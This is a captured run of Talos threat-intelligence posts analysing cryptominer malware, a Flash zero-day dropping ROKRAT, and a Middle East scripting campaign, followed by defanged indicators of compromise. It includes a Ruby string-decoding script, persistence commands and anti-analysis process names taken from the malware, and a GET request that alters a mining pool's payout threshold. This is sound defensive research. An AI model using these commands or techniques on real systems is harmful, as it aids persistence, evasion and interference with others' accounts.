                  Runtime resolved objects and functions make it difficult to extract all strings as the decompilation is not always perfect, and not all strings are decoded during dynamic analysis due to different code branches (as seen in the example above). The num6 length calculation produces three unique bytes (in decimal): [106, 242, 28] for each length. The result is that we can search for these bytes (being the first three of the length calculation) to find runtime calculated offsets. Once we know the length we can glean the ciphertext offset from the previous four bytes, and then brute force the XOR key at this offset by iterating over all possibilities and checking for resulting valid ASCII ranges:
                  #!/usr/bin/ruby

                  fr = File.read(ARGV[0])
                  fb = fr.bytes

                  for i in 0..fb.length-4
                  #Through their obfuscation technique we get an egg for obfuscated string lengths and offsets to find in the resource
                  if fb[i] == 106 && fb[i+1] == 242 && fb[i+2] == 28
                  #Perform their arithmetic with provided bytes into an 32-bit int
                  length = [fb[i-1], 106, 242, 28].pack("V*").split("\x00").join.unpack("V")[0] - 5 ^ 485648943
                  seek_offset_bytes = [fb[i-5], fb[i-4], fb[i-3], fb[i-2]]
                  seek_offset = (seek_offset_bytes.pack("V*").split("\x00").join.unpack("V")[0] ^ 2100157544) - 100
                  puts "Found length of: #{length}"
                  puts "Seek offset bytes: #{seek_offset_bytes.inspect}"
                  ciphertext = []
                  for j in 0..length-1
                  ciphertext << fb[seek_offset+j]
                  end
                  if length > 2
                  for x in 0x00..0xFF
                  finished = true
                  result = []
                  for c in ciphertext
                  unless((x ^ c).between?(0x20,0x7E))
                  finished = false
                  break
                  end
                  result << (x ^ c)
                  end
                  if finished
                  puts "Found possible XOR key for string: #{result.pack("I*").split("\x00").join} of length: #{length}"
                  end
                  end
                  end
                  end
                  end

                  This brute force approach provides some invalid results, however, also provides clear-text strings after manual review, all of which are available in the appendix. Some interesting strings to highlight are those intended to keep the computer online to continue mining:
                  /C net accounts /forcelogoff:no
                  This prevents forced logoffs from remote administrators.
                  /C net accounts /maxpwage:unlimited
                  This sets the maximum password age to unlimited, which in turn prevents password expiry.
                  /C powercfg /x /standby-timeout-ac 0
                  This will prevent the computer from entering standby mode, thus continuing mining operations when the computer is idle.
                  /C reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d 600000000 /f of length: 99
                  This will prevent the screensaver from starting.

                  Further, observed strings are those for anti-analysis:
                  procexp
                  PROCEXP
                  pROCESShACKER
                  ProcessHacker
                  procexp64
                  Detect detector!
                  Clear!
                  taskmgr

                  Dark Test Network traffic


                  Two GET requests are sent to the api.ipfy.org used for public IP address identification. This is then followed by a GET request to qyvtls749tio[.]com which sends HwProfileInfo.szHwProfileGuid for identification, a 64-bit flag, a video card parameter (which is always null), and the number of CPU cores. The server response provides youronionlink[.]onion URL locations of two executable files: bz.exe and cpu.zip
                  Dynamic Miner Activity Command Line Arguments

                  Oddly enough this is not a valid .onion address, and is likely a placeholder from the server for this dropper, or a kiddie who set this up without replacing what the gateway was returning to the dropper on request. When searching for this pattern we came across a valid pastebin address containing a number of SQL commands for setting up a database with these domains with Russian comments:
                  Pastebin SQL Commands

                  This further implies the possibility of a builder or distributed gateway being used. Further searches turned up a number of in-the-wild filenames which correspond to wares:
                  Dark Test VirusTotal Observed in-the-wild Filenames

                  This could indicate warez as being a possible distribution vector for this malware.

                  Dark Test Version 2


                  Throughout the month of November, we started observing a sample with the same command and control parameters, mining pool, and persistence executable name as Dark Test. However, it did not drop and execute a separate xmrig binary but contained a statically linked version instead. Due to shared attributes with the first version of Dark Test we believe this is a new iteration written in Visual C++ rather than C#. The binary is shipped within an NSIS self-extracting installer, which launches unpacking code that writes into a newly spawned suspended process and resumes the main thread. A notable difference is a more extensive list of anti-analysis strings which are searched for using Process32FirstW:
                  Anti-Analysis Strings

                  An interesting addition being vnc.exe to possibly detect VPS or analysis systems connected to using VNC.

                  Exploit Kit Based


                  In addition to the spam campaigns above Talos has also been observing RIG exploit kit delivering miners via smokeloader over the last couple months. The actual infection via the exploit kit is pretty standard for RIG activity. However, the great thing about mining is there are easily trackable elements left on the system, namely the 'Worker ID', as shown below:
                  Command Line Syntax

                  Using the Worker ID of:
                  43Z8WW3Pt1fiBhxyizs3HxbGLovmqAx5Ref9HHMhsmXR2qGr6Py1oG2QAaMTrmqWQw85sd1oteaThcqreW4JucrLGAqiVQD
                  we began digging into the amount of hashes this system is mining. What we found was a worker that was fluctuating between 25 KH/s and 60 KH/s. Taking the average at 42.5 KH/s, this actor was earning about $85/Day.

                  That may not seem like a substantial amount of money, but consider that the miner could remain running for months, if not years without being impacted without additional maintenance required by the actor. The only operational costs are associated with renting the exploit kit and associated infrastructure. Once victims are compromised, the activity continues for a cool $31,000 annually.

                  However, when we started looking further back, this campaign has been ongoing off and on over the last six months with peak hash rates in excess of 100 KH/sec.
                  Historical Hash Rate

                  The campaign appeared to pick up steam beginning in September 2017, but we have evidence of the miners being deployed from as far back as June or July of 2017. Suddenly, mining activity completely stopped toward the end of October, and started back up again in mid December. It's currently still running as of the writing of this post. This shows the earning potential of using an exploit kit to deploy miners via a malware loader like smokeloader.

                  Active Exploitation


                  In addition to threats targeting users, Talos has also observed coin miners being delivered via active exploitation in our honeypot infrastructure. This includes leveraging multiple different exploits to deliver these types of payloads. There have been widespread reports of EternalBlue being used to install miners, as well as various Apache Struts2 exploits, and most recently a Oracle WebLogic exploit. This type of payload is perfect for active exploitation since it doesn't require persistent access to the end system, it is largely transparent to the end user, and finally can result in significant financial gain.

                  When you take threats being delivered to users via email and web as well as internet connected systems being compromised to deliver a miner payload, it's obvious that miners are being pushed by adversaries today much like ransomware was being pushed to systems a year ago. Based on this evidence, we began digging a little bit deeper on the actual mining activity and the systems that have already been mining.

                  Deeper Dive on Mining and Workers


                  Over the course of several months, we began looking for crypto miner activity on systems and uncovered prevalent threats associated with multiple different groups relying on familiar tricks to run on systems. Additionally, we found a large number of enterprise users running or attempting to run miners on their systems for potential personal gain.

                  One thing that has been common with most of the malicious miners we found were the filename choices. Threat actors have chosen filenames that look harmless, such as "Windows 7.exe" and "Windows 10.exe". Additionally, Talos commonly saw "taskmgrss.exe", "AdobeUpdater64.exe", and "svchost.exe". Talos also found examples of miners being pulled dynamically and run via the command line, an example of which is shown below.
                  Command Line Syntax

                  Interestingly, we also found miners purporting to be anti-virus software, including our own free anti-virus product Immunet.

                  Mining as a Payload for the Future


                  Cryptocurrency miner payloads could be among some of the easiest money makers available for attackers. This is not to try and encourage the attackers, of course, but the reality is that this approach is very effective at generating long-term passive revenue for attackers. Attackers simply have to infect as many systems as possible, execute the mining software in a manner that makes it difficult to detect, and they can immediately begin generating revenue. Attackers will be likely be just as happy computing 10KH/s as 500KH/s. If they have a specific hashrate goal, they can simply continue distributing miners to victims until they reach that goal.

                  The sheer volume of infected machines is how attackers can measure success with these campaigns. Since financial gain via mining is the mission objective there is no need to attempt to compromise hosts to steal documents, passwords, wallets, private keys, as we've grown accustomed to seeing from financially motivated attackers. We have commonly seen ransomware delivered with additional payloads. These can either provide secondary financial benefit or, in some cases, deliver the real malicious payload. In the later case ransomware can be used a smoke screen designed to distract. While we have seen active vulnerability exploitation used as the initial vector for infecting systems with cryptocurrency mining software, that is the extent of the overtly malicious activity. Once a system has become infected in this scenario, attackers are typically focused on maximizing their hash rates and nothing more.

                  Simply leveraging the resources of a single infected system is likely not profitable enough for most attackers. However consider 100,000 systems and the profitability of this approach skyrockets. In most cases attackers attempt to generate as much revenue as easily and cheaply as possible. With mining software they already have their method of gains in the form of the control of system resources and the volume of hashes that can be generated by it.

                  Recurring revenue is not just something a legitimate business strives for. Malicious adversaries do as well. Complex malware is expensive to design, create, test, and then deliver to victims. Complex malware is often reserved for very complex attacks and rarely is this type of malware used to attack 100,000s of users. As such a recurring revenue model isn't really applicable to these complex malware attacks, generally speaking. With cryptominers attackers have created an entire solution specifically designed to do one thing: generate recurring revenue.

                  Continuing use of cryptominers as a payload and ensuring the system is running at full capacity will continue to evolve. Talos has observed attacks where the attacker has cleaned up the machine by removing other miners before then infecting the user and installing their own mining software. Attackers are already fighting for these resources as the potential monetary value and ongoing revenue stream is massive.

                  Are Miners Malware?


                  Mining client software itself should not be considered malware or a Potentially Unwanted Application/Potentially Unwanted Program (PUA/PUP). The legitimate mining client software is simply being leveraged in a malicious way by actors to ensure that they are able to generate revenue by mining on infected machines. Mining software is written specifically to ensure that the cryptocurrencies being used are available to people, to ensure consensus on the network, perform and validate transactions and reward miners performing the complex mathematical calculations to ensure the integrity and security of the cryptocurrency ecosystem & network.

                  If a legitimate user runs the mining software locally they can run their own mining platform; likewise a legitimate user can become part of a pool to try and maximize their chances of receiving a payout. The difference between the legitimate user and a threat actor is that they are performing this task intentionally. The malicious actor is performing this task, in the exact same manner as the legitimate user, but without the user's knowledge or consent. The difference is the deception that occurs for the end user and the intent behind mining the cryptocurrencies. The software itself is unfortunately part of the malicious arsenal the attacker chooses to use, but, much like when Powershell or PSExec is used in malicious attacks, the software itself is not malicious by design. It is the intent with which it is used that is important. When these miners are leveraged by attackers, victims are unwittingly forced to pay for the electricity used during the mining process and are having their computational resources abused to generate revenue for the actors.

                  Enterprise Impacts


                  Regardless of whether the miner was deployed using malicious methods or simply by an enterprise user trying to generate some coin from their work computer, enterprises have to decide if miners are malware within their environments.

                  This is an interesting challenge because generally the only thing miners do is utilize CPU/GPU cycles to complete complex math problems. However, it is wasted or stolen resources for an organization and depending on the configuration of these systems, it could have larger impacts. Obviously if a miner is placed onto a system via one of the methods discussed above it is a malicious payload. However, Talos found large numbers of users that appeared to willingly run these miners on enterprise systems to generate coin.

                  Due to the large amount of willing users, it might warrant an organization crafting a policy or adding a section to existing policy regarding the use of miners on enterprise systems and how it will be handled. Additionally, it is up to each organization to decide whether or not these file should be treated as malware, and removed/quarantined as such.

                  Fails we Found


                  While investigating malware campaigns that were distributing Monero mining software we observed an interesting case where the attacker used an open-source mining client called 'NiceHash Miner' and began distributing it. In this particular case, the command line syntax used to execute the miner on infected systems is below:
                  Command Line Syntax

                  Interestingly, the userpass parameter that is used to register the mining client to the specific Worker ID being used is '3DJhaQaKA6oyRaGyDZYdkZcise4b9DrCi2.Nsikak01'. When analyzing this particular campaign, we identified that this userpass is actually the default userpass specified in the mining software source code as released on GitHub. The attacker didn't bother to change it, resulting in all of the machines infected mining Monero which was being sent to the mining application's author - not the attacker themselves.
                  Source Code Default Values

                  In several other cases we observed attackers utilizing default values within the command line syntax being used to execute their miners. A few examples are below:
                  Mining Fail Example #1
                  Mining Fail Example #2
                  Mining Fail Example #3
                  Mining Fail Example #4

                  This clearly indicates that many of the attackers leveraging cryptocurrency miners are extensively using code and command line syntax they find online, and in some cases may not actually understand the code they are working with or how cryptocurrency mining even works. As a result, default values and placeholders are not always being updated to enable them to monetize or generate revenue from these sorts of attacks.

                  Additionally, while performing our research we found an interesting way that could, in theory, allow one to manipulate the payouts received by the attackers. Currently, within the web interface used by many of the mining pools (and exposed via an API), there is a "Personal Threshold" value that is publicly editable. This setting determines how much coin must be mined before the payout will be sent to the attacker's wallet. By setting this value to a large amount (e.g. 50 XMR) the attacker would have to wait an extended period before receiving their next payout. While the attacker could just change this value back, it could be changed right back to 50 XMR using a GET request as long as the request is made to the mining pool's URL using the following structure:

                  "https://p5[.]minexmr[.]com/set_info?address=$WORKER&type=thold&amount=50000000000000"

                  Where $WORKER is the 'Worker ID' that is being modified. This same parameter is available on many of the major mining pool websites that we analyzed. Note that the syntax could be different depending on the pool that is being used by the adversary.

                  Conclusion


                  The number of ways adversaries are delivering miners to end users is staggering. It is reminiscent of the explosion of ransomware we saw several years ago. This is indicative of a major shift in the types of payloads adversaries are trying to deliver. It helps show that the effectiveness of ransomware as a payload is limited. It will always be effective to ransom specific organizations or to use in targeted attacks, but as a payload to compromise random victims its reach definitely has limits. At some point the pool of potential victims becomes too small to generate the revenue expected.

                  Crypto miners may well be the new payload of choice for adversaries. It has been and will always be about money and crypto mining is an effective way to generate revenue. It's not going to generate large sums of money for each individual system, but when you group together hundreds or thousands of systems it can be extremely profitable. It's also a more covert threat than ransomware. A user is far less likely to know a malicious miner is installed on the system other than some occasional slow down. This increases the time a system is infected and generating revenue. In many ways its the exact opposite of ransomware. Ransomware is designed to generate revenue in a couple of days from a victim and the payoff is immediate. Malicious miners are designed to exist on a system for weeks, months, or ideally years.

                  It also introduces a new challenge to enterprises. A decision needs to be made on how to treat things like miners and whether they should be judged exclusively as malware. Each enterprise needs to decide how to handle these threats. The first step is determining how prevalent they are in your environment and then deciding how to handle it going forward.

                  Coverage


                  There are different ways to address miners and there is detection built in to Cisco security products to detect this activity. There is a specific detection name in AMP for coin miners, W32.BitCoinMiner. However, as these miners can be added as modules to various other threats, the detection names may vary. Additionally there are a couple NGIPS signatures designed to detect mining activity as well. However, these rules may not be enabled by default in your environment depending on the importance of potentially unwanted applications (PUA) in your network. The signatures that detect this type of activity includes, but isn't limited to: 40841-40842, 45417, and 45548-45550.

                  Also, technologies like Threat Grid have created indicators to clearly identify when mining activity is present when a sample is submitted.

                  IOC Section


                  IP Addresses:


                  89.248.169[.]136
                  128.199.86[.]57

                  Domains:


                  qyvtls749tio[.]com
                  youronionlink[.]onion

                  File Hashes


                  Flash 0 Day In The Wild: Group 123 At The Controls

                  $
                  0
                  0
                  This blog post is authored by Warren Mercer and Paul Rascagneres.

                  Executive Summary


                  The 1st of February, Adobe published an advisory concerning a Flash vulnerability (CVE-2018-4878). This vulnerability is a use after free that allows Remote Code Execute through a malformed Flash object. Additionally KISA (Korean CERT) published an advisory about a Flash 0 day used in the wild. Talos identified that an attacker exploited this vulnerability with a Flash object embedded in a Microsoft Excel document. By opening the document, the exploit was executed in order to download an additional payload from a compromised website.

                  We identified that the downloaded payload is the well-known Remote Administration Tool named ROKRAT. We already extensively spoke about this RAT on several articles in this blog: here, here, here and here. It is particularity used with cloud platforms in order to exfiltrate documents and manage infected systems.



                  Flash 0 Day: CVE-2018-4878


                  The campaign started by a malicious Microsoft Excel sheet:



                  This malicious document contains an ActiveX object. This object is a SWF file (Flash). The CVE-2018-4878 use after free vulnerability is used in order to download an additional payload from a compromised web server. This payload is a shellcode loaded in memory and executed. We identified Flash exploits from November 2017.

                  CC & ROKRAT Payload


                  As explained previously, the purpose of the exploit is to download and execute an additional payload on the Internet. Here are some URLs where this additional payload was downloaded:

                  • hxxp://www[.]1588-2040[.]co[.]kr/conf/product_old.jpg
                  • hxxp://www[.]1588-2040[.]co[.]kr/design/m/images/image/image.php
                  • hxxp://www[.]korea-tax[.]info/main/local.php
                  • hxxp://www[.]dylboiler[.]co[.]kr/admincenter/files/board/4/manager.php


                  All these URLs are compromised websites located in South Korea. We identified that several of these URLs hosted a shellcode used to unpack and execute a ROKRAT variant. Here is the PDB of this sample:

                  • d:\HighSchool\version 13\2ndBD\T+M\T+M\Result\DocPrint.pdb


                  It's the same PDB that was previously identified during our investigations. The exploit was used to drop ROKRAT on compromised systems. One of the ROKRAT samples identified used a naming reference to Hancom Secure AnySign. It is a reference to a legitimate application developed by Hancom Secure for PKI & authentication mechanisms. It is a software application used to protect user data and is massively used in South Korea.

                  Conclusion


                  Group 123 have now joined some of the criminal elite with this latest payload of ROKRAT. They have used an Adobe Flash 0 day which was outside of their previous capabilities - they did use exploits in previous campaigns but never a net new exploit as they have done now. This change represents a major shift in Group 123s maturity level, we can now confidentially assess Group 123 has a highly skilled, highly motivated and highly sophisticated group. Whilst Talos do not have any victim information related to this campaign we suspect the victim has been a very specific and high value target. Utilizing a brand new exploit, previously not seen in the wild, displays they were very determined to ensure their attack worked.

                  In January 2018 we produced a write up 'Korea In The Crosshair' detailing the campaigns previously carried out by Group 123. In this write up we explained this would not be the last time we witness attacks from this threat actor and that we would expect them to continue to evolve. Within a few weeks we have witnessed the evolution of Group 123 and we will continue to monitor the threat landscape for this group.

                  Coverage


                  Additional ways our customers can detect and block this threat are listed below.



                  Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

                  CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

                  Email Security can block malicious emails sent by threat actors as part of their campaign.

                  Network Security appliances such asNGFW,NGIPS, andMeraki MX can detect malicious activity associated with this threat.

                  AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

                  Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

                  Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

                  IOCs


                  Flash exploits:

                  fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0
                  3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c

                  ROKRAT sample:

                  E1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd

                  URL:

                  hxxp://www[.]1588-2040[.]co[.]kr/conf/product_old.jpg
                  hxxp://www[.]1588-2040[.]co[.]kr/design/m/images/image/image.php
                  hxxp://www[.]korea-tax[.]info/main/local.php
                  hxxp://www[.]dylboiler[.]co[.]kr/admincenter/files/board/4/manager.php

                  Beers with Talos EP 22: Forget the ASA, Rob Joyce Favorited Craig’s Tweet

                  $
                  0
                  0


                  Beers with Talos (BWT) Podcast Episode 22 is now available.  Download this episode and subscribe to Beers with Talos:

                  If iTunes and Google Play aren't your thing: www.talosintelligence.com/podcast

                  EP22 Show Notes: 

                  Recorded 2/2/18 - Guests two EPs in a row! We are joined by Omar Santos from Cisco PSIRT to discuss CVE-2018-0101, the Cisco ASA Remote Code Execution and Denial of Service Vulnerability. See the PSIRT post below for latest updates. We also discuss Crypto miners overtaking ransomware, a Flash 0-day carrying a known ROKRAT payload (huh??), and we couldn’t escape discussing Autosploit because Rob Joyce faved one of Craig’s tweets.

                  Timeline:

                  The Roundtable

                  01:01 - Meet Omar Santos from Cisco PSIRT
                  03:10 - Getting to bottom of how Craig has completely snowed Ashley
                  05:57 - Joel gets all Andy Rooney about shoe sizes
                  09:33 - Craig discusses how time is linear and we can’t see the future
                  11:46 - Mitch discusses the day the music died, similar to his joke
                  13:19 - Nigel discusses the most important football game on Feb 4
                  15:30 - Bonus! Talos BINGO

                  The Topics

                  17:02 - Cisco PSIRT’s Omar Santos discusses CVE-2018-0101 – Cisco ASA RCE and DoS Vuln
                  32:55 - Crypto miners generating millions, overtaking ransomware
                  47:27 - Autosploit - oh, did Craig mention that Rob Joyce favorited one of his tweets?
                  53:15 - Flash 0-day in the wild: What’s the logic behind burning an 0-day with a known payload?

                  The Links:

                  Talos Bingo tweet (@KrisJamieson) - https://twitter.com/KrisJamieson/status/958060402855858176
                  Omar Santos PSIRT post on CVE-2018-0101: https://blogs.cisco.com/security/cve-2018-0101
                  Ransom Where? Malicious Cryptocurrency Miners Takeover, Generating Millions: http://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html
                  Craig’s tweet that Rob Joyce liked: https://twitter.com/security_craig/status/959197187329744896
                  Flash 0-Day In The Wild: Group 123 At The Controls: http://blog.talosintelligence.com/2018/02/group-123-goes-wild.html
                  Panic! At the Cisco tweet: https://twitter.com/l1quidcryst4l/status/958057132447993856

                  ==========

                  Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
                  Hosted by Mitch Neff (@MitchNeff).

                  Find all episodes:
                  http://cs.co/talospodcast

                  Subscribe via iTunes (and leave a review!)
                  http://cs.co/talositunes

                  Check out the Talos Threat Research Blog:
                  http://cs.co/talosresearch

                  Subscribe to the Threat Source newsletter:
                  http://cs.co/talosupdate

                  Follow Talos on Twitter:
                  http://cs.co/talostwitter

                  Give us your feedback and suggestions for topics:
                  beerswithtalos@cisco.com

                  Targeted Attacks In The Middle East

                  $
                  0
                  0
                  This blog post is authored by Paul Rascagneres with assistance of Martin Lee.

                  Executive Summary


                  Talos has identified a targeted attack affecting the Middle East. This campaign contains the following elements, which are described in detail in this article.

                  • The use of allegedly confidential decoy documents purported to be written by the Jordanian publishing and research house, Dar El-Jaleel. This institute is known for their research of the Palestinian-Israeli conflict and the Sunni-Shia conflict within Iran.
                  • The attacker extensively used scripting languages (VBScript, PowerShell, VBA) as part of their attack. These scripts are used to dynamically load and execute VBScript functions retrieved from a Command & Control server.
                  • The attacker demonstrates excellent operational security (OPSEC). The attacker was particularly careful to camouflage their infrastructure. During our investigation, the attacker deployed several reconnaissance scripts in order to check the validity of victim machine, blocking systems that don't meet their criteria. The attacker uses the reputable CloudFlare system to hide the nature and location of their infrastructure. Additionally, the attacker filters connections based on their User-Agent strings, and only enables their infrastructure for short periods of time before blocking all connections.

                  This is not the first targeted campaign against the region that uses Dar El-Jaleel decoy documents which we have investigated. However, we have no indication that the previous campaigns are related.


                  VBS Campaign


                  Stage 1: VBScript


                  The campaign starts with a VBScript named من داخل حرب ايران السرية في سوريا.vbs ("From inside Iran's secret war in Syria.vbs"). Here are the script contents:

                  The purpose of this script is to create the second stage PowerShell script described in the next section.

                  Stage 2: PowerShell Script


                  The goal of the generated PowerShell script is to create a Microsoft Office document named Report.doc and to open it.

                  Stage 3: Office Document With Macros


                  Here is a screenshot of the Office document:
                  This document purports to be written by Dar El-Jaleel. Dar El-Jaleel is a publishing and studies house based in Amman, Jordan. This institute is well-known for their research concerning the Palestinian-Israeli conflict and the Sunni-Shia conflict in Iran. Tagged as confidential, the document is an analysis report on Iranian activities within the Syrian civil war.

                  This document contains a Macro:

                  The purpose of this Macro in to create a WSF (Windows Script File) file and to execute it.

                  Stage 4: WSF Script


                  The created WSF script is the main part of the infection:
                  The top of the script contains configuration information:

                  • the hostname of the Command & Control - office-update[.]services,
                  • the port - 2095,
                  • the User-Agent - iq.46-|-377312201708161011591678891211899134718141815539111937189811

                  The User-Agent is used to identify the targets. The CC filters network connections based on this string, only allowing through connections made with authorised User-Agent strings.

                  The first task of the script is to register the infected system by performing an HTTP request to http://office-update[.]services:2095/store. Next, the script executes an infinite loop, attempting to contact the /search URI every 5 seconds in order to download and execute additional payloads.

                  Additional Payloads


                  The WSF script receives payloads of three types, named s0, s1, s2. The payloads are VBScript functions loaded and executed on the fly with the ExecuteGlobal() and GetRef() APIs. The only differences between s0,s1 and s2 type payloads are the number of arguments supplied to the executing function. s0 does not require any arguments, s1 accepts one argument, and s2 two arguments.

                  The downloaded payload functions are obfuscated, here is an example of the raw data:

                  The first element is the function type (s0), followed by a separator '-|-'. The second element is the obfuscated function; this consists of ASCII values, separated by '*'. For example the above data decodes as:
                  • 45: -
                  • 54: 6
                  • 53: 5
                  • 43: +
                  • 49: 1
                  • 52: 4
                  • 56: 8
                  • 42: *
                  • 53: 5
                  • 51: 3
                  • 53: 5
                  • 45: -
                  • 52: 4
                  • 49: 1
                  • 56: 8
                  • 42: *
                  Hence, the decoded data is "-65+148*535-418*". Then follows a second step, again using '*' as a separator. Each mathematical operation is resolved to obtain a new ASCII value:
                  • -65+148 = 83 -> "S"
                  • 535-419 = 117 -> "u"
                  This technique is used to construct a new VBScript function.
                  During our investigation we received 5 different functions.

                  Reconnaissance Functions


                  During our investigation we received a reconnaissance function a few minutes after the initial compromise. The purpose of the function was to retrieve several pieces of information from the infected system, presumably in order to check if the target is valuable or not (or a sandbox system).

                  First, the attacker retrieves the disk volume serial number:

                  Secondly, the payload retrieves any installed anti-virus software:

                  Thirdly, it obtains the Internet IP address of the infected system by querying ipify.org (the code includes a hint that the attacker previously used wtfismyip.com):


                  Thirdly, it retrieves the computer name, the username, the Operating System and the architecture:

                  All these data are sent to the previously mentioned CC using the /is-return URI. The data are stored in the User-Agent separated by "-|-".

                  Subsequently, we received a second reconnaissance function:

                  The function acts to list the drives of the infected system and their type (internal drive, usb driver etc.)

                  Persistence Functions


                  In addition to the reconnaissance functions we received 2 functions linked to the persistence of the WSF script. The first script is used to persist, the second is used to clean the infected system. Our machine was served this after taking too much time to send a request to the C2 Presumably the attacker determined we were examining their systems and decided to remove the malware to prevent further analysis:

                  Pivot Function


                  Finally, we received a pivot function. The function is the only non-s0 function we obtained during our research. This is a s1 function that takes one argument:

                  Here is the argument:

                  The purpose is to execute a powershell script:
                  The PowerShell script executes a second base64 encoded script. The attacker forces the the system to use the 32 bit version of Powershell even if the operating system architecture is 64 bits.

                  Finally we obtain the last PowerShell script:

                  The purpose of this script is to download shellcode from 176[.]107[.]185[.]246 IP, to map it in memory and to execute it. The attacker takes many precautions before delivering the shellcode, these will be explained in the next chapter. Unfortunately during our investigation we weren't served the anticipated shellcode.

                  Attackers OPSEC


                  The attacker behind this campaign put a lot of effort into protecting its infrastructure and to avoid leaking code to analysts. The first Command & Control server is protected by CloudFlare. This choice complicates the analysis and tracking of the campaign. Additionally, the attacker filters on the User-Agent; if your web requests do not fit a specific pattern, your request will be ignored. During our analysis the attacker was only active during the morning (Central European Timezone), similarly the various different payloads were only sent during mornings (Central European Time). When an infected system receives the pivot function, the attacker disables their firewall for a few minutes to allow this unique IP to download the shellcode. Afterwards, the server becomes unreachable. Here is a schema of this workflow:

                  Additionally, we saw that the attackers blacklisted some of our specific User-Agent strings and IP addresses used during our investigation

                  This high level of OPSEC is exceptional even among presumed state sponsored threat actors...

                  Links with Jenxcus (a.k.a. Houdini/H-Worm)?


                  If you are familiar with Jenxcus (a.k.a. Houdini/H-Worm) you should see some similarities between the VBScript used during this campaign and this well-known malware: usage of the user-agent to exfiltrate data, reconnaissance techniques etc…

                  We cannot tell if the attacker used a new version of Jenxcus or if this malware served as the inspiration for their own malicious code. The source code of Jenxcus can be easily found on the Internet. However, the adaptation used in this campaign is more advanced: the features/functions are loaded on demand and the initial script does not include all the malicious code unlike Jenxcus.

                  Additional Targets


                  We can identify different targets based on the User-Agent used by the attacker to identify victims. These are a few examples:
                  c = "U.15.7"
                  a = "738142201756240710471556115716122461214187935862381799187598"


                  c = "1X.134"
                  a = "130427201706151111209123451288122413771234715862388136654339"


                  c = "Fb-20.9"
                  a = "585010201750201110021112344661899112271619123139116684543113"

                  Other Campaigns Using Dar El-Jaleel Decoy Documents


                  This is not the first time Talos has investigated targeted campaigns using Dar El-Jaleel decoy documents. During 2017, we identified several campaigns using the same decoy documents:

                  This document is a weekly report about the major events occuring during the 1st week of November 2017, talking about the most important events happening in Jordan, Iraq, Syria, Lebanon, Palestine, Israel, Russia, ISIS and the ongoing Gulf Countries conflict with Qatar.

                  We encountered this document in campaigns using .NET malware (with the CC: foxlive[.]life) and C++ malware (with the CC: download[.]share2file[.]pro). The purpose of the malwares was to retrieve information relating to the targeted systems and to download an additional payload. Moreover, we identified another campaign using a share2file[.]pro subdomain. Here is the decoy document in this campaign:

                  This document is a pension list of military personnel dated June 2017, containing names of individuals which we have redacted, alongside a military rank.

                  We don't know if these campaigns are performed by the same actor or different groups interested in this region. These campaigns are still under investigation.

                  Conclusion


                  These campaigns show us that at least one threat actor is interested in and targeting the Middle East. Due to the nature of the decoy documents, we can conclude that the intended targets have an interest in the geopolitical context of the region. The attackers used an analysis report alleged to be written by Dar El-Jaleel, a Jordanian institute specialising in studies of the region. Some of these documents are tagged as confidential.

                  During the VBS Campaign, we were surprised by the level of OPSEC demonstrated by the attacker and their infrastructure. Legitimate service such as CloudFlare were used to hide malicious activities. Additionally the attacker used user-agent filtering and firewall rules in order to grant access to specific infected systems for only a few minutes in order to deliver shellcode. Following this, the server became unreachable. Another notable observation is the fact that the attacker was active only during the morning (Central European timezone) during our investigation.

                  The usage of script languages is an interesting approach from the attackers' point of view. These languages are natively available on Windows system, provide a high degree of flexibility, and can easily stay under the radar.

                  Coverage


                  Additional ways our customers can detect and block this threat are listed below.

                  Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

                  CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

                  Email Security can block malicious emails sent by threat actors as part of their campaign.

                  Network Security appliances such asNGFW,NGIPS, andMeraki MX can detect malicious activity associated with this threat.

                  AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

                  Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

                  Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

                  IOCs


                  VBS Campaign:
                  Initial script: 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
                  Domain #1: office-update[.]services
                  IP #2: 176[.]107[.]185[.]246

                  .NET Campaign:
                  Initial dropper: 4b03bea6817f0d5060a1beb8f6ec2297dc4358199d4d203ba18ddfcca9520b48
                  .NET #1: d49e9fdfdce1e93615c406ae13ac5f6f68fb7e321ed4f275f328ac8146dd0fc1
                  .NET #2: e66af059f37bdd35056d1bb6a1ba3695fc5ce333dc96b5a7d7cc9167e32571c5
                  Domain #1: jo[.]foxlove[.]life
                  Domain #2: eg[.]foxlove[.]life
                  Domain #3: fox[.]foxlove[.]life

                  Campaign #3:
                  Initial Dropper: af7a4f04435f9b6ba3d8905e4e67cfa19ec5c3c32e9d35937ec0546cce2dd1ff
                  Payload: 76a9b603f1f901020f65358f1cbf94c1a427d9019f004a99aa8bff1dea01a881
                  Domain: download[.]share2file[.]pro

                  Campaign #4:
                  Initial Dropper: 88e4f306f126ce4f2cd7941cb5d8fcd41bf7d6a54cf01b4a6a4057ed4810d2b6
                  Payload #1: c5bfb5118a999d21e9f445ad6ccb08eb71bc7bd4de9e88a41be9cf732156c525
                  Payload #2: 1176642841762b3bc1f401a5987dc55ae4b007367e98740188468642ffbd474e
                  Domain: update[.]share2file[.]pro
                  Viewing all 2012 articles
                  Browse latest View live


                  <script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>